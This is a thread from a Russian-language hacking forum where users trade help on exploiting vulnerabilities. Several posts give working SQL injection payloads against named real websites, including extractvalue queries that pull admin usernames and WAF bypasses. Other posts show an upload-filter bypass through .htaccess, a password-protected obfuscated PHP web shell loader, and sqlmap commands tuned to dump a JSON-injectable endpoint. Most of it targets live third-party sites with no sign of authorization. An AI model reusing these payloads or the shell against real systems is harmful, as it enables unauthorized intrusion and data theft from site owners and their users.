Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. lifescore

    lifescore Elder - Старейшина

    Joined:
    27 Aug 2011
    Messages:
    631
    Likes Received:
    494
    Reputations:
    69
    конечно, импорт бд - добавляем учетку + привилегии путем импорта юзера или замены. Выолнить подобное на уровне mysql маровероятно, с давних версий по дефолту ограничена скуля с работой в файловой. Если конечно речь об mysql

    по аплоуду попробуй в случае апача .htaccess пропиши с расширением уже залитого файла выполнять как скрипт
    Code:
    <FilesMatch ".php3.53aadaa50075c72420b8656f14b0b68c">
    SetHandler application/x-httpd-php
    </FilesMatch>
    определяй где выполняется проверка (клаинт сайд/сервер сайд), байпасы не только на одном расширении заканчивается. Проще всего посмотреть вендра данного "чуда" и сбегать на сплойт-дб
     
  2. qwaszx000

    qwaszx000 Member

    Joined:
    10 Feb 2018
    Messages:
    27
    Likes Received:
    14
    Reputations:
    7
    А можно ли тут через нуль байт в имени файла работать?
    Это ведь, по идее, должно отрезать то, что добавляется в конце?
     
  3. d_dwacawaca

    d_dwacawaca Member

    Joined:
    4 Jan 2021
    Messages:
    37
    Likes Received:
    7
    Reputations:
    0
    От версии php зависит.
     
  4. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,255
    Likes Received:
    428
    Reputations:
    233
    Помогите обойти ваф
    Code:
    https://www.diakoneo.de/?tx_auwpagesmeta_pagecollector%5Btagevent%5D%5B%5D=25'
     
  5. neur0funk

    neur0funk Member

    Joined:
    9 May 2018
    Messages:
    22
    Likes Received:
    18
    Reputations:
    12
    Code:
    https://www.diakoneo.de/?tx_auwpagesmeta_pagecollector[tagevent][]=25,auw_pages_meta_tag)and(extractvalue/*a*/(0x0a,user/*a*/()))%23
     
    #2905 neur0funk, 8 Feb 2021
    Last edited: 8 Feb 2021
  6. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    195
    Likes Received:
    7
    Reputations:
    0
    Code:
    {"error":{"name":"SequelizeDatabaseError","message":"invalid input value for enum enum_user_order_entry_preferences_order_type_option: \"METAL'\"","parent":{"name":"error","length":143,"severity":"ERROR","code":"22P02","position":"63","file":"enum.c","line":"60","routine":"enum_in","sql":"UPDATE \"user_order_entry_preferences\" SET \"order_type_option\"='METAL''',\"updated_at\"='2021-02-08 04:38:57.370 +00:00' WHERE \"id\" = '2119'"},"original":{"name":"error","length":143,"severity":"ERROR","code":"22P02","position":"63","file":"enum.c","line":"60","routine":"enum_in","sql":"UPDATE \"user_order_entry_preferences\" SET \"order_type_option\"='METAL''',\"updated_at\"='2021-02-08 04:38:57.370 +00:00' WHERE \"id\" = '2119'"},"sql":"UPDATE \"user_order_entry_preferences\" SET \"order_type_option\"='METAL''',\"updated_at\"='2021-02-08 04:38:57.370 +00:00' WHERE \"id\" = '2119'"}}
    это sql?
     
  7. lifescore

    lifescore Elder - Старейшина

    Joined:
    27 Aug 2011
    Messages:
    631
    Likes Received:
    494
    Reputations:
    69
    это json :) ответ по существу и конкретике :)))

    троллинг тут не приветствуется наверно

    По сабжу, пример с этой же ORM
    https://www.aldeid.com/wiki/TryHackMe-OWASP-Juice-Shop
     
    #2907 lifescore, 9 Feb 2021
    Last edited: 9 Feb 2021
  8. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    634
    Likes Received:
    1,329
    Reputations:
    409
    Похоже, что это не инъекция. ORM сообщает, что значение невалидно, т.е. нет в перечисляемом типе. Остальное, а конкретно вид SQL запроса, скорее всего испольуется для наглядной отладки, не более того.
     
  9. acroobat

    acroobat New Member

    Joined:
    7 Feb 2021
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте, есть актуальная программа, которая проверит порты на наличие уязвимостей?
     
  10. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    2,027
    Likes Received:
    913
    Reputations:
    199
    Code:
    sh -c grep SYN_RECV /tmp/check_ddos.res | awk {'print $5'}
    Есть такой скрипт от рута, кто хорошо дружит с AWK подскажите есть ли возможность исполнить свой код, или записать в файл данные подставленные в $5? При условии что Файл доступен на запись

    из man awk:
    Code:
    print                 Print the current record.  The output record is terminated with the value of ORS.
    
           print expr-list       Print expressions.  Each expression is separated by the value of OFS.  The output record is terminated with the value of ORS.
    
           print expr-list >file Print expressions on file.  Each expression is separated by the value of OFS.  The output record is terminated with the value of
                                 ORS.
    
           printf fmt, expr-list Format and print.  See The printf Statement, below.
    
           printf fmt, expr-list >file
                                 Format and print on file.
    
     
    _________________________
  11. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    607
    Likes Received:
    1,023
    Reputations:
    46
    на мой взгляд нет, так как вы не имеете возможность манипулировать саму строку для awk. Получается что-то вроде prepared statements для скули, даже если параметры манипулировать, то они не исполняются.
    Code:
    test@test: cat /tmp/check_ddos.res
    SYN_RECV `whoami` ;whoami |whoami $(whoami) &&whoami ;{whoami}
    test@test: grep SYN_RECV /tmp/check_ddos.res | awk {'print $1 $2 $3 $4 $5 $6 $7'}
    SYN_RECV`whoami`;whoami|whoami$(whoami)&&whoami;{whoami}
     
    dmax0fw likes this.
  12. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,255
    Likes Received:
    428
    Reputations:
    233
    подскажите как limit можно обойти?
    Code:
    https://www.diakoneo.de/?tx_auwpagesmeta_pagecollector[tagevent][]=25,auw_pages_meta_tag)and(extractvalue/*a*/(null,concat/*a*/(1,(select+username+from+be_users+limit+0,1))))%23
     
  13. polzunki

    polzunki New Member

    Joined:
    28 Jul 2020
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
    Доброго всем.
    Opencart. Версия не известна.
    Могу залить файлы через catalog/download
    Но, только те, что закодированы ионкубом. При переходе по ссылке, отображается закодированный код.
    Так же если меняю расширение на wso.php.jpg файл не заливается. Проверка идёт по содержимому заливаемого файла.
    Перепробовал все обфусцированные шеллы, что только смог найти, заливаются только те, где не содержится <?php.
    Но после заливки код не работает. Отображается в таком виде:

    [​IMG]

    Подскажите, что можно сделать?

    И просьба подсказать, как зайти на этот шелл?

    Code:
    <?php $pl = @strlen($pass = isset($_POST['pass']) ? md5($_POST['pass']) : (isset($_POST['hash']) ? $_POST['hash'] : md5('')));
    $l = @strlen($d = base64_decode($d));
    for ($n = 0;$n < $l;$n++) {
        $d{$n} = chr(ord($d{$n}) ^ ord($pass{$n % $pl}));
    }
    if ($d = @gzuncompress($d)) {
        eval("?>$d<?");
    } else { ?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><title>Password</title></head><body><center><form method="POST"><input type="password" name="pass" /><input type="submit" /></form></center></body></html><?}
     
  14. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    607
    Likes Received:
    1,023
    Reputations:
    46
    вам нужен пароль ($pass = isset($_POST['pass']) ? md5($_POST['pass'])) ну и собственно сами данные шелла, которые лeжат в переменной d ($d = base64_decode($d);).
    Потомм данные d ксорятся с ключом pass, распаковываются и выполняются.
     
    DezMond™ and Baskin-Robbins like this.
  15. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,255
    Likes Received:
    428
    Reputations:
    233
    Помогите раскрутить
    Code:
    https://www.illingen.de/corona'
     
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    882
    Reputations:
    859
    _ww.illingen.de/corona')or(ExtractValue(1,concat_ws(0x3a,version())))=('1

     
    _________________________
  17. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    69
    Likes Received:
    7
    Reputations:
    0
    Hi
    Can u help to bypass and contunie this sqli with sqlmap ?
    POST /sendtwofactor.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    X-Requested-With: XMLHttpRequest
    Referer: https://setup.sk/
    Cookie: PHPSESSID=961073f8435f8bee3b34b3e6b4ff6c48;lng=en
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate
    Content-Length: 40
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari>
    Host: setup.sk
    Connection: Keep-alive

    login=if(now()=sysdate()%2Csleep(6)%2C0)

    at this moment sqlmap can not dump dbs, and I tried some tamper scripts also

    Thanks !
     
  18. Duble

    Duble New Member

    Joined:
    28 Oct 2015
    Messages:
    54
    Likes Received:
    3
    Reputations:
    0
    Добрый день, подскажите пожалуйста.
    Есть сайт, уязвимость в json нашел с помощью acunetix
    Отчет такой
    Code:
    POST site.com/api/R/countTabs HTTP/1.1
    Content-Type: application/json;charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Referer: https://site.com/
    Cookie: sails.sid=s%3AIEeBmBWMv6pkUjHoX13K94m6bsxyZETu.mAjwObh334BpSZtHzJN1nY4HBjL%2Fiyt3uvwTjN6K5pQ;rtl=0;noAuthLanguage=%7B%22languageId%22%3A2%2C%22languageName%22%3A%22ru%22%7D;44cc0ec1aaa79f8d1d2757739ec41b84=1;favorites=j%3A%5B%2216880%22%5D;csrftoken=uq60dSDyNfzDlNREVBpktbbTqAxQDhPrfH3WQqvmfCw8ZgcqVZkYF91wKftnxCcS
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate
    Content-Length: 143
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
    Host:site.com
    Connection: Keep-alive
    
    {"where":{"chart":{"not":"[]"},"invisible":"0 RLIKE (SELECT (CASE WHEN (1+1-2+000194=2+2-4+000194) THEN 1 ELSE 0x28 END)) -- "},"tab":"growth"}
    Так вот, чем крутить такое? Точнее через что?
     
  19. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    607
    Likes Received:
    1,023
    Reputations:
    46
    так как стало самому интересно, решил потестить, в общем если коротко, то скульмап распознаёт что имеет дело с JSON, и указывать заголовки не обязательно. В том месте где находится инъекция (в вашем случае "invisible") вставляете просто звёздочку (*) и смотря что за запрос, можно поставить дефолтовое знание через prefix (например --prefix=0):
    Code:
    sqlmap -u 'http://site.com/api/R/countTabs' -H 'Content-Type: application/json;charset=UTF-8' --data='{"where":{"chart":{"not":"[]"},"invisible":"*"},"tab":"growth"}' --prefix=0
    Что-бы потестить поднял простой скрипт:
    Данные в базе:
    Code:
    CREATE DATABASE testdb;
    CREATE USER IF NOT EXISTS 'testuser'@'localhost' IDENTIFIED BY 'password';
    GRANT ALL PRIVILEGES ON testdb.* TO 'testuser'@'localhost';
    FLUSH PRIVILEGES;
    CREATE TABLE users(id INT AUTO_INCREMENT PRIMARY KEY, firstname VARCHAR(255) NOT NULL, lastname VARCHAR(255) NOT NULL, active BOOLEAN NOT NULL DEFAULT FALSE);
    INSERT INTO users(firstname,lastname,active) VALUES('Ivan','Test',0);
    INSERT INTO users(firstname,lastname,active) VALUES('John','Doe',0);
    INSERT INTO users(firstname,lastname,active) VALUES('Test','Admin',1);
    Само "приложение" с JSON (естественно с отладкой и кривое и косое)...
    Code:
    <?php
    
    $host = 'localhost';
    $dbname = 'testdb';
    $username = 'testuser';
    $password = 'password';
    
    try {
        $conn = new mysqli($host, $username, $password, $dbname);
        // Check connection
        if ($conn->connect_error) {
              die("Connection failed: " . $conn->connect_error);
        }
        echo "Connected successfully";
    }catch(mysqli_sql_exception $e){
        throw $e;
    }
    
    # Deprecated since PHP5.6 and removed since PHP7
    # https://www.php.net/manual/pt_BR/reserved.variables.httprawpostdata.php
    #var_dump($HTTP_RAW_POST_DATA);
    
    
    $inputJSON = file_get_contents('php://input');
    var_dump($inputJSON);
    
    $jsonOBJ = json_decode($inputJSON);
    
    var_dump($jsonOBJ);
    
    $invisible_var = $jsonOBJ->{"where"}->{"invisible"};
    
    var_dump($invisible_var);
    
    
    $sql = 'SELECT id,firstname,lastname FROM users WHERE active=' . $invisible_var;
    printf("SQL query: ".$sql);
    $conn->real_query($sql);
    if ($result = $conn->use_result()) {
      foreach ($result as $row) {
        echo "\nid = " . $row['id'] . " firstname = " . $row['firstname'] . " lastname = " .$row['lastname'];
        }
        /* free result set */
      $result->close();
    }
    
    $conn->close();
    ?>
    Поднимаем локальный пых-сервер в папке с "приложением" (у меня оно лежит под json_server.php)
    Code:
    php -S localhost:1234
    Теперь тест от руки:
    Code:
    curl -X POST -d '{"where":{"chart":{"not":"[]"},"invisible":"0"},"tab":"growth"}' -H 'Content-Type: application/json;charset=UTF-8' http://localhost:1234/json_server.php
    --------------------------------
    Connected successfullystring(63) "{"where":{"chart":{"not":"[]"},"invisible":"0"},"tab":"growth"}"
    object(stdClass)#4 (2) {
      ["where"]=>
      object(stdClass)#3 (2) {
        ["chart"]=>
        object(stdClass)#2 (1) {
          ["not"]=>
          string(2) "[]"
        }
        ["invisible"]=>
        string(1) "0"
      }
      ["tab"]=>
      string(6) "growth"
    }
    string(1) "0"
    SQL query: SELECT id,firstname,lastname FROM users WHERE active=0
    id = 1 firstname = Ivan lastname = Test
    id = 2 firstname = John lastname = Doe
    Теперь простейшая иньекция:
    Code:
    curl -X POST -d '{"where":{"chart":{"not":"[]"},"invisible":"0 OR 1=1"},"tab":"growth"}' -H 'Content-Type: application/json;charset=UTF-8' http://testserver:1234/json_server.php
    ------------------------------------
    Connected successfullystring(70) "{"where":{"chart":{"not":"[]"},"invisible":"0 OR 1=1"},"tab":"growth"}"
    object(stdClass)#4 (2) {
      ["where"]=>
      object(stdClass)#3 (2) {
        ["chart"]=>
        object(stdClass)#2 (1) {
          ["not"]=>
          string(2) "[]"
        }
        ["invisible"]=>
        string(8) "0 OR 1=1"
      }
      ["tab"]=>
      string(6) "growth"
    }
    string(8) "0 OR 1=1"
    SQL query: SELECT id,firstname,lastname FROM users WHERE active=0 OR 1=1
    id = 1 firstname = Ivan lastname = Test
    id = 2 firstname = John lastname = Doe
    id = 3 firstname = Test lastname = Admin
    Дальше запускаем Бурп и в другой консоли/терминале запускаем скульмап:
    Code:
    sqlmap -u 'http://testserver:1234/json_server.php' --dbms=mysql --data='{"where":{"chart":{"not":"[]"},"invisible":"*"},"tab":"growth"}' --proxy='http://localhost:8080'
    custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
    JSON data found in POST body. Do you want to process it? [Y/n/q] Y
    [18:40:18] [INFO] flushing session file
    [18:40:18] [INFO] testing connection to the target URL
    [18:40:18] [INFO] checking if the target is protected by some kind of WAF/IPS
    [18:40:18] [INFO] testing if the target URL content is stable
    [18:40:18] [INFO] target URL content is stable
    [18:40:18] [INFO] testing if (custom) POST parameter 'JSON #1*' is dynamic
    [18:40:18] [WARNING] (custom) POST parameter 'JSON #1*' does not appear to be dynamic
    [18:40:18] [WARNING] heuristic (basic) test shows that (custom) POST parameter 'JSON #1*' might not be injectable
    [18:40:18] [INFO] testing for SQL injection on (custom) POST parameter 'JSON #1*'
    [18:40:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [18:40:19] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
    [18:40:19] [INFO] testing 'Generic inline queries'
    [18:40:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [18:40:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
    [18:40:19] [WARNING] time-based comparison requires larger statistical model, please wait............... (done)                                                                                                                          
    it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
    [18:40:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
    [18:40:20] [WARNING] (custom) POST parameter 'JSON #1*' does not seem to be injectable
    [18:40:20] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
    
    При этом без прификса скульмап не смог раскрутить скулю
    Code:
    sqlmap -u 'http://testserver:1234/json_server.php' --dbms=mysql --data='{"where":{"chart":{"not":"[]"},"invisible":"*"},"tab":"growth"}' --proxy='http://localhost:8080' --flush-session --prefix=0
    custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
    JSON data found in POST body. Do you want to process it? [Y/n/q] Y
    [18:43:08] [INFO] flushing session file
    [18:43:08] [INFO] testing connection to the target URL
    [18:43:08] [INFO] checking if the target is protected by some kind of WAF/IPS
    [18:43:08] [INFO] testing if the target URL content is stable
    [18:43:09] [INFO] target URL content is stable
    [18:43:09] [INFO] testing if (custom) POST parameter 'JSON #1*' is dynamic
    [18:43:09] [INFO] (custom) POST parameter 'JSON #1*' appears to be dynamic
    [18:43:09] [WARNING] heuristic (basic) test shows that (custom) POST parameter 'JSON #1*' might not be injectable
    [18:43:09] [INFO] heuristic (XSS) test shows that (custom) POST parameter 'JSON #1*' might be vulnerable to cross-site scripting (XSS) attacks
    [18:43:09] [INFO] testing for SQL injection on (custom) POST parameter 'JSON #1*'
    [18:43:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [18:43:09] [WARNING] reflective value(s) found and filtering out
    [18:43:09] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
    [18:43:09] [INFO] testing 'Generic inline queries'
    [18:43:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [18:43:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
    [18:43:09] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)                
    [18:43:19] [INFO] (custom) POST parameter 'JSON #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
    for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
    [18:43:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [18:43:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    [18:43:25] [INFO] target URL appears to be UNION injectable with 3 columns
    [18:43:25] [INFO] (custom) POST parameter 'JSON #1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
    (custom) POST parameter 'JSON #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Y
    sqlmap identified the following injection point(s) with a total of 55 HTTP(s) requests:
    ---
    Parameter: JSON #1* ((custom) POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: {"where":{"chart":{"not":"[]"},"invisible":"0 AND (SELECT 8656 FROM (SELECT(SLEEP(5)))iyJH)"},"tab":"growth"}
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 5 columns
        Payload: {"where":{"chart":{"not":"[]"},"invisible":"0 UNION ALL SELECT CONCAT(0x7170786b71,0x697a4b487962727759494a414871686b654176576663644e4b55574770616b786a66626f617a6d47,0x716b707871),NULL,NULL-- -"},"tab":"growth"}
    ---
    [18:43:27] [INFO] the back-end DBMS is MySQL
    web application technology: PHP 7.4.15
    back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
    
     
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    882
    Reputations:
    859
    Можно было просто взять пакет запроса с акунектикса, в уязвимом параметре поставить звездочку, сохранить в файл и вызвать его параметром -r file.txt
     
    _________________________
    fandor9, Duble, joelblack and 2 others like this.
Loading...